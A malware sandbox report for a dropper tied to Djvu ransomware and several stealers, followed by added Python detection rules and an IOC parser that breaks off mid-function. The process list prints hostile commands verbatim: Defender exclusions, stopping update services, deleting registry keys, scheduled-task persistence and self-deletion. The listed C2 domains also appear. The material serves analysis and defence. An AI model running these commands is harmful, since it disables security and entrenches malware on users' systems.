Analysis Overview
SHA256
dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967
Threat Level: Known bad
The file dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967 was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
Vidar
Suspicious use of NtCreateUserProcessOtherParentProcess
Djvu Ransomware
Detected Djvu ransomware
Raccoon
Amadey
Lumma Stealer
Modifies security service
Stops running service(s)
Downloads MZ/PE file
Modifies file permissions
Reads user/profile data of web browsers
Deletes itself
Reads user/profile data of local email clients
Loads dropped DLL
VMProtect packed file
Executes dropped EXE
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Checks installed software on the system
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Checks processor information in registry
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-25 09:34
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 09:34
Reported
2023-04-25 09:37
Platform
win10-20230220-en
Max time kernel
151s
Max time network
148s
Command Line
Signatures
Amadey
Detected Djvu ransomware
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2848 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | C:\Windows\Explorer.EXE |
Vidar
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
VMProtect packed file
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\cc3c16d1-0a6a-40b1-8a83-03a5c769f412\\2879.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\2879.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\24035804214954848532.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\5005.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\CC99.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\256A.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CEFB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\24035804214954848532.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe
"C:\Users\Admin\AppData\Local\Temp\dc57bf03e268cc1385eb63d0a380aba9716cb81b3e85606f73de209223421967.exe"
C:\Users\Admin\AppData\Local\Temp\256A.exe
C:\Users\Admin\AppData\Local\Temp\256A.exe
C:\Users\Admin\AppData\Local\Temp\2720.exe
C:\Users\Admin\AppData\Local\Temp\2720.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Users\Admin\AppData\Local\Temp\2879.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\cc3c16d1-0a6a-40b1-8a83-03a5c769f412" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\2879.exe
"C:\Users\Admin\AppData\Local\Temp\2879.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\2879.exe
"C:\Users\Admin\AppData\Local\Temp\2879.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe"
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe"
C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build3.exe
"C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\ProgramData\24035804214954848532.exe
"C:\ProgramData\24035804214954848532.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\256A.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1904
C:\Users\Admin\AppData\Local\Temp\BFF7.exe
C:\Users\Admin\AppData\Local\Temp\BFF7.exe
C:\Users\Admin\AppData\Local\Temp\C1DD.exe
C:\Users\Admin\AppData\Local\Temp\C1DD.exe
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\C48D.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Users\Admin\AppData\Local\Temp\C48D.exe
"C:\Users\Admin\AppData\Local\Temp\C48D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\C48D.exe
"C:\Users\Admin\AppData\Local\Temp\C48D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe"
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build2.exe"
C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build3.exe
"C:\Users\Admin\AppData\Local\e0b799ca-a1af-4f92-9603-f59ad559e17a\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\819894d9-b4d4-47ba-906a-9890a601a927\build2.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\5005.exe
C:\Users\Admin\AppData\Local\Temp\5005.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 788
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\CC99.exe
C:\Users\Admin\AppData\Local\Temp\CC99.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 780
C:\Users\Admin\AppData\Local\Temp\CEFB.exe
C:\Users\Admin\AppData\Local\Temp\CEFB.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
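The process list above records, as plain command lines, the techniques the signatures summarise: the self-delete via `timeout /t 6 & del`, the `icacls /deny *S-1-1-0` lock on the ransomware's working folder, two different every-minute `schtasks` persistence tasks, the Defender path exclusion through `Add-MpPreference`, the `sc stop` / `reg delete` chain against the Windows Update services, the `powercfg` sleep-timeout changes and the HKCU Run key fallback. The block below is an added example, not part of the report or of any of the malware families it names: a small rule set that scans process-creation command lines for exactly those patterns. The sample input is constructed by copying (and in two cases shortening) lines from the Processes section, plus one harmless launch as a control; the ATT&CK technique IDs attached to each rule are this example's own annotation, not something the report states.

```python
"""Flag the defence-evasion and persistence command lines recorded in this report."""
import re
from dataclasses import dataclass

# Constructed sample input: command lines copied (some shortened) from the
# Processes section of the report, plus one plain launch that should not fire.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\256A.exe" & exit',
    r'icacls "C:\Users\Admin\AppData\Local\cc3c16d1-0a6a-40b1-8a83-03a5c769f412" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f',
    r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0',
    r"""reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe'""",
    r'"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"',  # control: no technique visible here
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str        # ATT&CK ID: this example's own mapping, "-" where none is assigned
    pattern: re.Pattern


# One rule per technique visible in the report's process list. Case-insensitive,
# because schtasks was seen both as "/create /sc minute" and "/Create /SC MINUTE".
RULES = [
    Rule("self_delete_after_timeout", "T1070.004", re.compile(r"timeout\s+/t\s+\d+\s*&\s*del\s+/f", re.I)),
    Rule("icacls_deny_everyone",      "T1222.001", re.compile(r"icacls\s+.*/deny\s+\*S-1-1-0", re.I)),
    Rule("schtasks_every_minute",     "T1053.005", re.compile(r"/create\b.*/sc\s+minute\s+/mo\s+1\b", re.I)),
    Rule("defender_path_exclusion",   "T1562.001", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    Rule("update_service_stopped",    "T1489",     re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    Rule("service_key_deleted",       "T1112",     re.compile(r'reg\s+delete\s+"HKLM\\SYSTEM\\CurrentControlSet\\Services\\', re.I)),
    Rule("sleep_timeouts_disabled",   "-",         re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I)),
    Rule("hkcu_run_key_added",        "T1547.001", re.compile(r'reg\s+add\s+"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"', re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    technique: str
    evidence: str         # the matched fragment, for the analyst's triage note


def scan(cmdlines):
    """Apply every rule to every command line; one Finding per (line, rule) hit."""
    findings = []
    for i, cmd in enumerate(cmdlines):
        for rule in RULES:
            m = rule.pattern.search(cmd)
            if m:
                findings.append(Finding(i, rule.name, rule.technique, m.group(0)))
    return findings


def summarize(findings):
    """Count hits per rule, which is the view a detection dashboard wants."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"line {f.line_no}: {f.rule} [{f.technique}] <- {f.evidence}")
    print(summarize(scan(SAMPLE_CMDLINES)))
```

Run on the constructed sample, every line except the control fires at least one rule, and the `sc stop` / `reg delete` line fires two. The rules key on the command-line shape rather than on the file names (`mstsca.exe`, `oneetx.exe`, `updater.exe`), which change between builds; the task-interval, the Everyone-deny SID and the service names are the parts an operator is least likely to vary.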
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 104.21.18.99:80 | potunulit.org | tcp |
| US | 52.182.143.208:443 | | tcp |
| US | 8.8.8.8:53 | 99.18.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| EE | 91.235.234.235:80 | | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| MX | 187.212.177.109:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 109.177.212.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.233.171.211.in-addr.arpa | udp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 176.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.55.52.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fakethedead.com | udp |
| BZ | 78.142.29.185:443 | fakethedead.com | tcp |
| US | 8.8.8.8:53 | 185.29.142.78.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| US | 8.8.8.8:53 | 149.2.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.77.109.52.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| MX | 187.212.177.109:80 | colisumy.com | tcp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| US | 8.8.8.8:53 | 50.4.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 35.20.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
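Most rows in the network table are noise for blocking purposes: queries to the sandbox's resolver, reverse (`in-addr.arpa`) lookups, and repeated connections to the same host. The block below is an added example, not part of the report: it parses rows in the table's markdown layout and reduces them to unique domains, unique destination endpoints, and the domain-to-IP mapping the TCP rows give. The sample input is constructed from rows copied from the table above; two of them are written in the shifted form a flattened table can produce (Domain blank, the Proto value sitting in the Domain column), so the parser has to tolerate that. The resolver address to ignore is an assumption about this sandbox, taken from the table itself.

```python
"""Reduce the Network table of a sandbox report to a de-duplicated IOC set."""
import re
from collections import defaultdict

# Constructed sample input: rows copied from the report's Network table. Two rows
# carry a blank Domain with the protocol slid one column to the left.
SAMPLE_NETWORK_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 104.21.18.99:80 | potunulit.org | tcp |
| US | 52.182.143.208:443 | tcp | |
| US | 8.8.8.8:53 | 99.18.21.104.in-addr.arpa | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| EE | 91.235.234.235:80 | tcp | |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| KR | 211.171.233.129:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
""".strip().splitlines()

SANDBOX_RESOLVER = "8.8.8.8:53"          # assumption: the sandbox's DNS server, never an IOC
_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_row(line):
    """Return (country, destination, domain, proto) for a data row, else None."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4 or cells[0] == "Country":
        return None
    country, dest, domain, proto = cells
    # Repair the shifted layout: a blank Proto with "tcp"/"udp" in the Domain cell.
    if proto == "" and domain.lower() in ("tcp", "udp"):
        proto, domain = domain, ""
    return country, dest, domain, proto.lower()


def extract_iocs(rows, ignore_endpoints=(SANDBOX_RESOLVER,)):
    """Collect unique domains, unique ip:port endpoints and domain->IP resolutions."""
    domains, endpoints = set(), set()
    resolved = defaultdict(set)
    for line in rows:
        parsed = parse_row(line)
        if parsed is None:
            continue
        _country, dest, domain, proto = parsed
        ip = dest.rsplit(":", 1)[0]
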